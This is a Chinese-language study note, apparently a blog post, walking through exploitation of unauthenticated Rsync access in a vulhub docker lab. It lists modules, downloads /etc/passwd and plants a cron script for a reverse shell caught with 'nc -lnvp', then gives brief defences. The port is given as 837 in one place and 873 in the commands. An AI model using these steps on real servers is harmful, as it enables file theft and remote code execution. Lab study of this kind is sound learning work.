未授权访问:Rsync 未授权访问漏洞

目录

1、漏洞原理

2、环境搭建

3、未授权访问

4、利用rsync下载任意文件

5、利用rsync反弹shell

防御手段


今天继续学习各种未授权访问的知识和相关的实操实验,一共有好多篇,内容主要是参考先知社区的一位大佬的关于未授权访问的好文章,还有其他大佬总结好的文章:

这里附上大佬的好文章链接:常见未授权访问漏洞总结 - 先知社区

我在这只是学习大佬总结好的相关的知识和实操实验,那么废话不多说,开整。

第九篇是关于Rsync的未授权访问

1、漏洞原理

Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。

Rsync 默认允许匿名访问,**如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。**Rsync 的默认端口为 837。

2、环境搭建

#利用DownGit下载https://github.com/vulhub/vulhub/tree/master/rsync/common
DownGit网址:https://minhaskamal.github.io/DownGit/#/home

上传文件到靶机并进行解压

unzip common.zip

编译并启动docker容器

cd common/
docker-compose build && docker-compose up -d

3、未授权访问

rsync rsync://172.16.2.250:873/
rsync rsync://172.16.2.250:873/src

可以看到成功的未授权访问到了Rsync的src问价爱你

4、利用rsync下载任意文件

rsync rsync://172.16.2.250:873/src/etc/passwd ./

5、利用rsync反弹shell

下载crontab配置文件

rsync rsync://172.16.2.250:873/src/etc/crontab ./
复制代码

写入bash并赋权

vim nc
chmod 777

将文件上传至/etc/cron.hourly

rsync -av nc rsync://172.16.2.250:873/src/etc/cron.hourly

本地监听9999

nc -lnvp 9999

等待一会,可以看到反弹成功了。

防御手段

  • -账户认证:正确配置认证用户名及密码。
  • -权限控制:使用合理的权限。
  • -网络访问控制:控制接入源ip。
  • -数据加密传输等

到此Rsync未授权访问漏洞的基础知识也就暂时学习到这里了,后面还有很多的未授权访问知识等着我去学习,我们下次见(*^▽^*)

相关推荐
Daniel 大东14 分钟前
BugJson因为json格式问题OOM怎么办
java·安全
中云DDoS CC防护蔡蔡1 小时前
微信小程序被攻击怎么选择高防产品
服务器·网络安全·微信小程序·小程序·ddos
速盾cdn3 小时前
速盾:CDN是否支持屏蔽IP?
网络·网络协议·tcp/ip
yaoxin5211233 小时前
第二十七章 TCP 客户端 服务器通信 - 连接管理
服务器·网络·tcp/ip
内核程序员kevin3 小时前
TCP Listen 队列详解与优化指南
linux·网络·tcp/ip
PersistJiao5 小时前
Spark 分布式计算中网络传输和序列化的关系(一)
大数据·网络·spark
EasyNVR5 小时前
NVR管理平台EasyNVR多个NVR同时管理:全方位安防监控视频融合云平台方案
安全·音视频·监控·视频监控
黑客Ash7 小时前
【D01】网络安全概论
网络·安全·web安全·php
->yjy7 小时前
计算机网络(第一章)
网络·计算机网络·php
摘星星ʕ•̫͡•ʔ9 小时前
计算机网络 第三章:数据链路层(关于争用期的超详细内容)
网络·计算机网络